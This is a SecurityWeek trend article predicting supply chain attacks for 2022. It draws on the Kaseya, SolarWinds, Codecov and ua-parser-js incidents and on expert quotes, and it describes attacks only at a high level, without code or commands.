Think of a supply chain attack as hub and spokes. It’s a one-to-many relationship: compromise one and get the rest free. One-to-many is the key attraction of supply chain attacks. This is not a new idea, but it’s been taken to new levels of sophistication and frequency in recent years. This growth will continue through 2022 and beyond.
Mike Sentonas, CTO at CrowdStrike, comments, “Frankly put, supply chains are vulnerable, and adversaries are actively researching ways to take advantage of this. We haven’t nearly seen the end of these attacks, and the implications for each one are significant for both the victims and the victims’ customers and partners up and down the chain.”
Supply chains are attractive targets for both cybercriminal gangs and nation-state actors. For the former, they provide the potential for large-scale extortion attacks (see Cyber Insights 2022: Ransomware), while for the latter they can provide extensive access to espionage-linked targets (see Cyber Insights 2022: Nation-States). Both were illustrated in 2021.
Network management software firm Kaseya was breached by the now-dismantled REvil ransomware gang, leading to the compromise of managed services customers and further compromises to their customers.
Kaseya’s remote monitoring and management package, Virtual Administration Assistant (VSA), was accessed via an authentication bypass vulnerability, allowing malware to be distributed via software downloads to customers. Within days of the compromise being discovered, Kaseya announced that between 800 and 1,500 downstream customers had been affected by the attack.
A major supply chain attack by nation state actors was illustrated by the SolarWinds incident. Although the initial breach at SolarWinds occurred in 2019, it wasn’t disclosed until late 2020, and the typical low and slow operation of nation state actors meant the full effects weren’t known or discovered until 2021.
The SolarWinds perpetrator is believed to be APT29 (aka Cozy Bear), linked to the Russian Foreign Intelligence Service (FSR). SolarWinds reported that around 18,000 customers were affected by downloads of its compromised software. But of these, it is thought that the attackers further targeted just a few hundred organizations (including government agencies and cybersecurity firms).
These two incidents illustrate the attraction and extent of supply chain attacks and suggest that we will see more of the same in 2022 and beyond.
Pandemic disruption will lead to supply chain attacks
The global effect of the Covid-19 pandemic will play out in supply chain attacks during 2022. The initial switch to remote working and more lately to hybrid office/home working, has expanded the attack surface for all organizations. Larger companies have the resources to cope with this – for example with the general supply of company-owned and controlled devices.
Smaller companies often cannot or do not do this. Smaller companies are consequently at a disproportionately greater risk from compromise via remote workers – but smaller companies are often part of the supply chain of larger corporations. “Cybercriminals,” warns Guido Grillenmeier, chief technologist at Semperis, “will continue to find easy ways into an organization by attacking a smaller or newer company higher up the supply chain that hasn’t got strong cyber defenses in place. There is no doubt that we will see more supply chain attacks in the new year.”
Ryan Sydlik, a security engineer at Telos, has a similar view of both cause and effect for 2022. “Covid-19, and more specifically its aftermath,” he said, “is affecting supply chains. Recovery from the virus is uneven globally, resulting in unbalanced supply and demand between nations. Expect cyberattacks on the supply chain to take an already backed-up situation and make it worse on already stressed supply chains.”
Like Grillenmeier, he expects the less well-protected smaller firm to be a key entry point. “In addition to large corporations involved in global trade, small and medium players in the supply chain will be targeted in 2022 as adversaries recognize that these entities are the most vulnerable choke points and have less robust security. A well targeted outage at the right place and time, could disrupt entire industries.”
More specifically, James Carder, CSO and VP at LogRhythm Labs, believes that Covid-19 vaccine manufacturers will be targeted. “In 2022, cybercriminals will set their sights on carrying out a ransomware attack against one of the pharmaceutical companies producing the COVID-19 vaccine. This will interrupt the production of critical booster shots and keep many other lifesaving drugs from reaching patients. The resulting fallout will fan the flame for foreign and domestic vaccine disinformation campaigns.” The pharmaceutical supply chain is a prime target for compromising the vaccine manufacturer.
The current global chip shortage is also partly fanned by the pandemic. The surge in remote working and remote learning has created a heavy demand on chip-using consumer electronics. At the same time, chip fabrication suffered from the various lockdowns – demand heavily exceeded supply. This is expected to continue throughout 2022.
Carder expects criminals to use the supply chain to take advantage of the situation. “A leading country producing semiconductor chips will have its supply-chain compromised, resulting in major shortages of critical materials,” he suggests.
“As countries seek to ramp up production,” he continued, “one country will be caught attempting to corner the market by using fraudulent methods to gain access to the production and supply of the leading chip-producing countries. This will result in shortages of critical supplies, as well as soaring prices for basic goods.”
Software supply chain
Software will continue to be a primary supply chain target throughout 2022 and beyond. The most common approach used by hackers so far is to breach a software application provider and modify the application code that is downloaded by customers (as in both SolarWinds and Kaseya).
However, a third supply chain attack in 2021 gives us a glimpse of potential future supply chain attacks – this time against open-source software (OSS) rather than application providers. “Our digital economy runs on open-source software (OSS),” explains Lavi Lazarovitz, head of research at CyberArk Labs. “It’s flexible, scalable and harnesses collective community power to spark new innovations. But countless ‘open’ and ‘free’ OSS libraries also mean a dramatically expanded attack surface and a way for threat actors to automate their efforts, sidestep detection and do more harm.”
From January 31, 2021, malicious actors had access to and were able to alter the code of Codecov’s Bash Uploader. Continuous integration (CI) meant that Bash Uploader users automatically used the compromised code, ultimately allowing the attacker to steal tokens, keys and credentials from companies around the world.
OSS is not usually audited by the user, and CI means it is just accepted and used. “Using this highly evasive infiltration method, attackers can target and steal credentials to reach thousands of organizations across a supply chain in unison,” added Lazarovitz.
OSS is a huge target for attackers. OSS software libraries are used by countless developers in countless companies, often with little oversight. If the source of the OSS can be compromised, vulnerabilities could be introduced into any application that uses the OSS library.
“In the next 12 months, attackers will continue looking for new ways to compromise open-source libraries,” continues Lazarovitz. “We have seen attackers implementing typosquatting-like attacks by creating code packages that include subtle changes to the packages’ names (such as ‘atlas-client’ rather than ‘atlas_client’). These were actually trojanized versions of the original packages, which implement or download a backdoor or credential-stealing functionality. In another case, an NPM package was trojanized to run cryptomining script and credential theft malware after a developer’s credentials were compromised.”
The NPM attack is typical of what can be expected in the future. In October 2021, GitHub announced that three versions of ‘ua-parser-js’ had been compromised. It’s a popular package, with something like 8 million downloads per week. “Any computer that has this package installed or running should be considered fully compromised,” warned GitHub. “All secrets and keys stored on that computer should be rotated immediately from a different computer.”
The cloud is also a natural target for supply chain attacks. By its nature it is fundamentally a one-to-many structure – and this alone makes it attractive to cybercriminals. In 2022, “A large-scale software supply chain attack will take down a major cloud computing service,” warns Josh Rickard, security solutions architect at Swimlane.
“As organizations add more third-party SaaS and IaaS providers to their technology stack,” he explains, “the impact of cyberattacks on centralized cloud services will have a broader effect. In 2022, we will see cybercriminals take advantage of misconfigured SaaS APIs to exploit private data at an unprecedented scale. This will lead to a large distribution of core software code becoming compromised and impacting thousands of organizations across the globe.”
Supply chain attacks in the future
Any topography that provides a one-to-many relationship should be considered a potential target for supply chain attacks in 2022. While they have occurred for many years, 2021 has demonstrated a dramatic increase in both quantity and sophistication – and we can expect them to increase further in 2022.
“Supply chain attacks are not as frequent as others, but they have the potential to cause exponentially more harm,” warns Chris Hall, cloud security researcher at Lacework. “This was evidenced in the 2020 SolarWinds hack and 2021’s Codecov and NPM project attacks. The ‘one-to-many’ opportunity afforded by a successful supply chain compromise makes it an attractive option and worthy of attackers’ time and resources. For this reason, we believe that 2022 will see more attacks against software supply chains by both criminal and nation state actors.”
The unknown quantity is the software bill of materials (SBOM) mandated in Biden’s executive order on Improving the Nation’s Cybersecurity of May 12, 2021. In theory it will provide granular visibility into the individual software components of any application; and that could potentially make software more secure. Only time will tell, however, whether this will be enough to disrupt the criminals’ disruption of the supply chain.
About SecurityWeek Cyber Insights 2022
Cyber Insights 2022 is a series of articles examining the potential evolution of threats over the new year and beyond. Six primary threat areas are discussed:
• Improving Criminal Sophistication
Although the subjects have been separated, the attacks will rarely occur in isolation. Nation state and supply chain attacks will often be linked ‒ as will supply chain and ransomware. Adversarial AI will likely be seen primarily in attacks against identity; at least in the short term. And underlying everything is the growing sophistication and professionalism of the cybercriminal.
SecurityWeek spoke with dozens of security experts and received almost a hundred suggestions for the series.